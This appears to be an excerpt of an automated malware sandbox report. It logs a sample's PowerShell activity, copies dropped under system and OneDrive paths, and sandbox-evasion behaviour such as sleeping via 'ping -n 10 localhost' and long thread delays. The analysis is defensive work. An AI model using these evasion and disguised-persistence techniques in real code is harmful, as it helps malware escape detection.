                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Uses ping.exe to sleep
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 1B320000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: F80000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 32A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1750000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1B3A0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 810000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 1A4F0000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: CA0000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1A8E0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 30D0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1B0D0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: C40000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 1A960000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 3060000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1B2B0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 28C0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1A8C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 10A0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 1ACF0000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 710000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1A350000 memory reserve | memory write watch
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1AC0000 memory reserve | memory write watch
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1B320000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 17E0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1800000 memory reserve | memory write watch
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1B3C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 17A0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 1B300000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 600000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599766
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599563
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599406
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599255
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599110
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598957
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598817
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598649
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 3600000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598469
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598321
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598202
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598090
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597979
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597851
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597422
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597063
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596922
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596781
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596668
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596538
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596360
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596047
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595937
